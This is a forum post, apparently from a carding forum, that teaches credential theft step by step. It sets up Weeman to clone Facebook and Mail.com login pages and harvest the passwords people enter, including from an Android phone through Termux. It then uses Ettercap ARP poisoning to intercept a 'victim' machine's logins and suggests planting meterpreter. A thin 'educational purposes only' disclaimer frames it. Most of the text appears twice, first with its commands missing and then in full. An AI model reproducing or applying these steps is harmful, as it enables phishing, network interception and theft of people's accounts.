Carder
Professional
- Messages
- 2,616
- Reaction score
- 1,934
- Points
- 113
Today we will tell you about a simple but very useful tool that will help you get any phishing site up on your knees and in 5 minutes!
As a bonus, we will tell you how to do the same from your Android smartphone, as well as how to make a more powerful attack using Ettercap.
Attention! The information below is for educational purposes only and is not a call to action!
Weeman is a simple python HTTP server that generates phishing pages. It accepts user input and verifies registration information.
Let's get started
Let's look at dependencies first:
1. python 2.7;
2. pip2;
3. python-dev.
Let's go to the weeman directory:
And run weeman.py:
After launch, we see the following picture.
So let's start building a phishing site.
First, let's select our site:
Let's choose a port:
And let's write where after that it will direct the user:
And launch:
Then if someone comes in and enters their data, we will see something like this:
In order to plant this site on a victim, we can use an application like Ettercap or LanGhost to carry out a middleman attack.
Thanks to this, we will be able to intercept and analyze his traffic and even send our own traffic to his computer. In other words, due to the fact that he connected to our access point, we got full control over all incoming and outgoing data.
In addition, we will be able to intercept emails and passwords for other applications and networks. If desired, we can even implement meterpreter or another wiretap application into his system if we want to get more information.
Ettercap
Ettercap is an open source utility for analyzing the security of computer networks. The main purpose of which is MITM attacks (Man In The Middle attacks). It has the ability to sniffing of live connections, filtering content on the fly, and many other interesting features. Supports both active and passive protocol attacks and includes a large number of functions for network and host analysis.
More information can be found on the official Ettercap website.
Before proceeding, let's do a little setup. Open the file /etc/etter.conf:
Find these lines in it and uncomment them:
After all the above operations are done, launch Ettercap. However, for some, including me, Ettercap will not work. Errors like “ SEND L3 ERROR “ will appear . To prevent such errors from appearing, use the following command:
Now everything should work fine and errors shouldn't pop up.
Launch Ettercap:
An application window will appear before us, as shown below.
Click on the Sniff -> Unified sniffing button. After that, we select the interface that is used. I have eth0.
In the top menu, click the Hosts - Scan for hosts buttons.
Now we click again Hosts - Hosts list. A window will appear as shown in the figure below.
Here we need to choose goals, i.e. choose a machine that will act as a "victim" and a gateway. As you can see from the architecture of the network that we use, the machine with the IP address = 192.168.1.3 acts as a “victim”. Well, as a gateway, the IP address = 192.168.1.1. Therefore, select 192.168.1.3 and click the Add to Target 1 button. Now click on 192.168.1.1 and click the Add to Target 2 button.
Next, click Mitm - ARP poisoning. After that, select Sniff remote connections.
Click OK. It remains only to run. To do this, click on the Start - Start sniffing button.
Sniffing is running. It remains to wait for the user to enter their data, for example, from an email account.
As soon as he entered his username / password and successfully entered his mailbox, the attacker also successfully intercepted his username and password:
Bonus
We will use the Termux console to run Weeman on your Android device. Many people call Termux the best linux emulator, agree. Download and open. For the convenience of using the terminal, I advise you to download the additional Hacker's Keyboard, later you will understand why.
We start preparing for the installation, enter two commands in the console sequentially:
This operation may take some time, depending on your internet speed.
Further:
The question "Do yo want to contiune? [Y / n]" appears. Yes, we want to continue, we enter a small "y" (this means yes).
The following command:
The question "Do yo want to contiune? [Y / n]" will appear again. We do the same.
With this command we have installed python (programming language), in which weeman is written.
Done, we have installed everything weeman needs to run.
Download weeman:
Great, let's write the command:
It displays the contents of directories.
If after this command nothing appears in the console, then try repeating the steps above.
If everything is ok, then let's continue:
These files appeared. Launch weeman:
We succeeded, the installation was successful and we launched weeman.
To display the help for the commands in the console, write:
Now we need to set some settings (for example, Mail.com). Let's enter the following commands:
With the first command, we set the URL of the site that we want to copy.
Install the port with the second command.
The third command determines the address to which the person who provided their data will be sent.
We register show, check the correctness of the settings:
That's right, we continue:
All is ready. The server is running, here is its address:
Copy "http : // localhost : 8080" and enter it into the browser, but on the phone (now this server is local and exists only on your device). Further, everything is by analogy with the desktop.
Thank you all for your attention!
As a bonus, we will tell you how to do the same from your Android smartphone, as well as how to make a more powerful attack using Ettercap.
Attention! The information below is for educational purposes only and is not a call to action!
Weeman is a simple python HTTP server that generates phishing pages. It accepts user input and verifies registration information.
Let's get started
Let's look at dependencies first:
1. python 2.7;
2. pip2;
3. python-dev.
Installation
First you need to clone it to your PC:
Code:
git clone https://github.com/evait-security/weeman.git

Let's go to the weeman directory:
Code:
cd weeman
And run weeman.py:
Code:
sudo python2 weeman.py
After launch, we see the following picture.

So let's start building a phishing site.
First, let's select our site:
Code:
set url https://www.facebook.com
Let's choose a port:
Code:
set port 8080
And let's write where after that it will direct the user:
Code:
set action_url https://www.facebook.com
And launch:
Code:
run


Then if someone comes in and enters their data, we will see something like this:
Code:
email => 123456789@mail.com
pass => 123456789
In order to plant this site on a victim, we can use an application like Ettercap or LanGhost to carry out a middleman attack.
Thanks to this, we will be able to intercept and analyze his traffic and even send our own traffic to his computer. In other words, due to the fact that he connected to our access point, we got full control over all incoming and outgoing data.
In addition, we will be able to intercept emails and passwords for other applications and networks. If desired, we can even implement meterpreter or another wiretap application into his system if we want to get more information.
Ettercap
Ettercap is an open source utility for analyzing the security of computer networks. The main purpose of which is MITM attacks (Man In The Middle attacks). It has the ability to sniffing of live connections, filtering content on the fly, and many other interesting features. Supports both active and passive protocol attacks and includes a large number of functions for network and host analysis.
More information can be found on the official Ettercap website.
Install / Configure Ettercap
You can download and install Ettercap from sources - here. Alternatively, you can use the following command:
Code:
apt-get install ettercap-gtk ettercap-common
Before proceeding, let's do a little setup. Open the file /etc/etter.conf:
Code:
nano /etc/etter.conf
Find these lines in it and uncomment them:
Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i% iface -p tcp --dport% port -j REDIRECT --to-port% rport"
redir_command_off = "iptables -t nat -D PREROUTING -i% iface -p tcp --dport% port -j REDIRECT --to-port% rport"
After all the above operations are done, launch Ettercap. However, for some, including me, Ettercap will not work. Errors like “ SEND L3 ERROR “ will appear . To prevent such errors from appearing, use the following command:
Code:
# echo "1" & gt; / proc / sys / net / ipv4 / ip_forward
# cat / proc / sys / net / ipv4 / ip_forward
Now everything should work fine and errors shouldn't pop up.
Interception of passwords
First, look at the network architecture (see figure below) that will be used. This is necessary so that you understand well what is coming from and from where.Launch Ettercap:
Code:
# ettercap -G
An application window will appear before us, as shown below.

Click on the Sniff -> Unified sniffing button. After that, we select the interface that is used. I have eth0.

In the top menu, click the Hosts - Scan for hosts buttons.

Now we click again Hosts - Hosts list. A window will appear as shown in the figure below.

Here we need to choose goals, i.e. choose a machine that will act as a "victim" and a gateway. As you can see from the architecture of the network that we use, the machine with the IP address = 192.168.1.3 acts as a “victim”. Well, as a gateway, the IP address = 192.168.1.1. Therefore, select 192.168.1.3 and click the Add to Target 1 button. Now click on 192.168.1.1 and click the Add to Target 2 button.
Next, click Mitm - ARP poisoning. After that, select Sniff remote connections.

Click OK. It remains only to run. To do this, click on the Start - Start sniffing button.
Sniffing is running. It remains to wait for the user to enter their data, for example, from an email account.
As soon as he entered his username / password and successfully entered his mailbox, the attacker also successfully intercepted his username and password:
Code:
HTTP: 94.100.184.17:443 - & gt; USER: <strong> my_testing_akk </strong> PASS: <strong> my_secret_password </strong> INFO: http://mail.com/
Bonus
We will use the Termux console to run Weeman on your Android device. Many people call Termux the best linux emulator, agree. Download and open. For the convenience of using the terminal, I advise you to download the additional Hacker's Keyboard, later you will understand why.
We start preparing for the installation, enter two commands in the console sequentially:
Code:
$ apt update
$ apt install
This operation may take some time, depending on your internet speed.
Further:
Code:
$ apt install git
The question "Do yo want to contiune? [Y / n]" appears. Yes, we want to continue, we enter a small "y" (this means yes).
The following command:
Code:
$ apt install python2
The question "Do yo want to contiune? [Y / n]" will appear again. We do the same.
With this command we have installed python (programming language), in which weeman is written.
Done, we have installed everything weeman needs to run.
Download weeman:
Code:
$ git clone https://github.com/evait-security/weeman
Great, let's write the command:
Code:
$ ls
It displays the contents of directories.
If after this command nothing appears in the console, then try repeating the steps above.
If everything is ok, then let's continue:
Code:
$ cd weeman
$ ls
These files appeared. Launch weeman:
Code:
$ python2 weeman.py
We succeeded, the installation was successful and we launched weeman.
To display the help for the commands in the console, write:
Code:
$ help
Now we need to set some settings (for example, Mail.com). Let's enter the following commands:
Code:
$ set url https://mail.com
$ set port 8080
$ set action_url https://mail.com
With the first command, we set the URL of the site that we want to copy.
Install the port with the second command.
The third command determines the address to which the person who provided their data will be sent.
We register show, check the correctness of the settings:
Code:
$ show
That's right, we continue:
Code:
$ run
All is ready. The server is running, here is its address:
Copy "http : // localhost : 8080" and enter it into the browser, but on the phone (now this server is local and exists only on your device). Further, everything is by analogy with the desktop.
Thank you all for your attention!